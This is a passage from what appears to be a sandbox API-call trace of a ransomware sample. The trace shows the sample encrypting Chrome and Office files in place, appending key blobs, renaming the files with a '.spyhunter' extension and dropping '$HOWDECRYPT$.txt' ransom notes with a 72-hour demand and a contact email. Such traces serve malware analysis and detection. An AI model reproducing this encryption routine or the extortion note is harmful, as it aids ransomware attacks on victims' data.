[0177.130] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e434, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e434*=0x30, lpOverlapped=0x0) returned 1 [0177.130] CloseHandle (hObject=0xa0) returned 1 [0177.130] GetProcessHeap () returned 0x2c0000 [0177.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.130] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx.spyhunter") returned 98 [0177.130] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\docs.crx"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\docs.crx.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\docs.crx.spyhunter")) returned 1 [0177.131] GetProcessHeap () returned 0x2c0000 [0177.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.131] GetProcessHeap () returned 0x2c0000 [0177.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.132] GetProcessHeap () returned 0x2c0000 [0177.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5e2c0 | out: hHeap=0x2c0000) returned 1 [0177.132] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e470 | out: pbBuffer=0x270e470) returned 1 [0177.132] GetProcessHeap () returned 0x2c0000 [0177.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.132] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e468*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e468*=0x30) returned 1 [0177.132] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.133] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig") returned 87 [0177.133] StrStrW (lpFirst="chrome_child.dll.sig", lpSrch=".txt") returned 0x0 [0177.133] GetProcessHeap () returned 0x2c0000 [0177.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.133] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e42c*=0x57f, lpOverlapped=0x0) returned 1 [0177.192] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa81, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.192] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x57f, lpNumberOfBytesWritten=0x270e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e42c*=0x57f, lpOverlapped=0x0) returned 1 [0177.192] GetProcessHeap () returned 0x2c0000 [0177.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0177.192] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.192] WriteFile (in: hFile=0xa0, lpBuffer=0x270e46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e42c, lpOverlapped=0x0 | out: lpBuffer=0x270e46c*, lpNumberOfBytesWritten=0x270e42c*=0x4, lpOverlapped=0x0) returned 1 [0177.192] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e42c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e42c*=0x30, lpOverlapped=0x0) returned 1 [0177.193] CloseHandle (hObject=0xa0) returned 1 [0177.193] GetProcessHeap () returned 0x2c0000 [0177.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.193] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig.spyhunter") returned 97 [0177.193] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.sig"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.sig.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.sig.spyhunter")) returned 1 [0177.195] GetProcessHeap () returned 0x2c0000 [0177.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.195] GetProcessHeap () returned 0x2c0000 [0177.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.195] GetProcessHeap () returned 0x2c0000 [0177.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4c730 | out: hHeap=0x2c0000) returned 1 [0177.195] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e470 | out: pbBuffer=0x270e470) returned 1 [0177.195] GetProcessHeap () returned 0x2c0000 [0177.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.195] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e468*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e468*=0x30) returned 1 [0177.195] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.197] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll") returned 83 [0177.197] StrStrW (lpFirst="chrome_child.dll", lpSrch=".txt") returned 0x0 [0177.197] GetProcessHeap () returned 0x2c0000 [0177.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0177.197] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e42c*=0x2800, lpOverlapped=0x0) returned 1 [0177.199] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.199] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e42c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e42c*=0x2800, lpOverlapped=0x0) returned 1 [0177.200] GetProcessHeap () returned 0x2c0000 [0177.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0177.200] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.200] WriteFile (in: hFile=0xa0, lpBuffer=0x270e46c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e42c, lpOverlapped=0x0 | out: lpBuffer=0x270e46c*, lpNumberOfBytesWritten=0x270e42c*=0x4, lpOverlapped=0x0) returned 1 [0177.402] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e42c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e42c*=0x30, lpOverlapped=0x0) returned 1 [0177.402] CloseHandle (hObject=0xa0) returned 1 [0177.406] GetProcessHeap () returned 0x2c0000 [0177.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.407] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.spyhunter") returned 93 [0177.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome_child.dll.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome_child.dll.spyhunter")) returned 1 [0177.408] GetProcessHeap () returned 0x2c0000 [0177.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.408] GetProcessHeap () returned 0x2c0000 [0177.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.408] GetProcessHeap () returned 0x2c0000 [0177.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e20 | out: hHeap=0x2c0000) returned 1 [0177.408] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e468 | out: pbBuffer=0x270e468) returned 1 [0177.409] GetProcessHeap () returned 0x2c0000 [0177.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.409] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e460*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e460*=0x30) returned 1 [0177.409] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.410] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig") returned 81 [0177.410] StrStrW (lpFirst="chrome.dll.sig", lpSrch=".txt") returned 0x0 [0177.410] GetProcessHeap () returned 0x2c0000 [0177.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0177.411] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e424, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e424*=0x57f, lpOverlapped=0x0) returned 1 [0177.476] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffa81, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.476] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x57f, lpNumberOfBytesWritten=0x270e424, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e424*=0x57f, lpOverlapped=0x0) returned 1 [0177.477] GetProcessHeap () returned 0x2c0000 [0177.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.477] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.477] WriteFile (in: hFile=0xa0, lpBuffer=0x270e464*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e424, lpOverlapped=0x0 | out: lpBuffer=0x270e464*, lpNumberOfBytesWritten=0x270e424*=0x4, lpOverlapped=0x0) returned 1 [0177.477] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e424, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e424*=0x30, lpOverlapped=0x0) returned 1 [0177.477] CloseHandle (hObject=0xa0) returned 1 [0177.477] GetProcessHeap () returned 0x2c0000 [0177.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.477] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig.spyhunter") returned 91 [0177.477] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.sig"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\chrome.dll.sig.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\chrome.dll.sig.spyhunter")) returned 1 [0177.478] GetProcessHeap () returned 0x2c0000 [0177.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.478] GetProcessHeap () returned 0x2c0000 [0177.478] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.478] GetProcessHeap () returned 0x2c0000 [0177.479] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9c40 | out: hHeap=0x2c0000) returned 1 [0177.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.479] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0177.479] WriteFile (in: hFile=0xa0, lpBuffer=0x270e39b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e4c4, lpOverlapped=0x0 | out: lpBuffer=0x270e39b*, lpNumberOfBytesWritten=0x270e4c4*=0x127, lpOverlapped=0x0) returned 1 [0177.480] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0177.480] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e4c4*=0x2ac, lpOverlapped=0x0) returned 1 [0177.480] CloseHandle (hObject=0xa0) returned 1 [0177.480] GetProcessHeap () returned 0x2c0000 [0177.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9a78 | out: hHeap=0x2c0000) returned 1 [0177.481] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e460 | out: pbBuffer=0x270e460) returned 1 [0177.481] GetProcessHeap () returned 0x2c0000 [0177.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.481] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e458*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e458*=0x30) returned 1 [0177.481] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.481] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb") returned 74 [0177.481] StrStrW (lpFirst="vstoee90.tlb", lpSrch=".txt") returned 0x0 [0177.481] GetProcessHeap () returned 0x2c0000 [0177.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0177.482] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e41c*=0x2800, lpOverlapped=0x0) returned 1 [0177.576] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.576] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e41c*=0x2800, lpOverlapped=0x0) returned 1 [0177.576] GetProcessHeap () returned 0x2c0000 [0177.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0177.576] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.576] WriteFile (in: hFile=0xa0, lpBuffer=0x270e45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e41c, lpOverlapped=0x0 | out: lpBuffer=0x270e45c*, lpNumberOfBytesWritten=0x270e41c*=0x4, lpOverlapped=0x0) returned 1 [0177.672] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e41c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e41c*=0x30, lpOverlapped=0x0) returned 1 [0177.672] CloseHandle (hObject=0xa0) returned 1 [0177.674] GetProcessHeap () returned 0x2c0000 [0177.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.674] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.spyhunter") returned 84 [0177.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\vstoee90.tlb.spyhunter")) returned 1 [0177.676] GetProcessHeap () returned 0x2c0000 [0177.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.676] GetProcessHeap () returned 0x2c0000 [0177.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.676] GetProcessHeap () returned 0x2c0000 [0177.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4550 | out: hHeap=0x2c0000) returned 1 [0177.676] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e460 | out: pbBuffer=0x270e460) returned 1 [0177.676] GetProcessHeap () returned 0x2c0000 [0177.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0177.677] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e458*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e458*=0x30) returned 1 [0177.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\actionspane3.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.678] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd") returned 78 [0177.678] StrStrW (lpFirst="ActionsPane3.xsd", lpSrch=".txt") returned 0x0 [0177.678] GetProcessHeap () returned 0x2c0000 [0177.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0177.679] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e41c*=0x87, lpOverlapped=0x0) returned 1 [0177.680] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff79, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0177.680] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x87, lpNumberOfBytesWritten=0x270e41c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e41c*=0x87, lpOverlapped=0x0) returned 1 [0177.680] GetProcessHeap () returned 0x2c0000 [0177.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0177.680] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.680] WriteFile (in: hFile=0xa0, lpBuffer=0x270e45c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e41c, lpOverlapped=0x0 | out: lpBuffer=0x270e45c*, lpNumberOfBytesWritten=0x270e41c*=0x4, lpOverlapped=0x0) returned 1 [0177.680] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e41c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e41c*=0x30, lpOverlapped=0x0) returned 1 [0177.680] CloseHandle (hObject=0xa0) returned 1 [0177.680] GetProcessHeap () returned 0x2c0000 [0177.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0177.681] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.spyhunter") returned 88 [0177.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\actionspane3.xsd"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\ActionsPane3.xsd.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\actionspane3.xsd.spyhunter")) returned 1 [0177.682] GetProcessHeap () returned 0x2c0000 [0177.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0177.682] GetProcessHeap () returned 0x2c0000 [0177.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0177.682] GetProcessHeap () returned 0x2c0000 [0177.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee9f00 | out: hHeap=0x2c0000) returned 1 [0177.682] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\VSTO\\10.0\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vsto\\10.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0177.684] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0177.684] WriteFile (in: hFile=0xa0, lpBuffer=0x270e38f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e4b8, lpOverlapped=0x0 | out: lpBuffer=0x270e38f*, lpNumberOfBytesWritten=0x270e4b8*=0x127, lpOverlapped=0x0) returned 1 [0177.685] lstrlenA 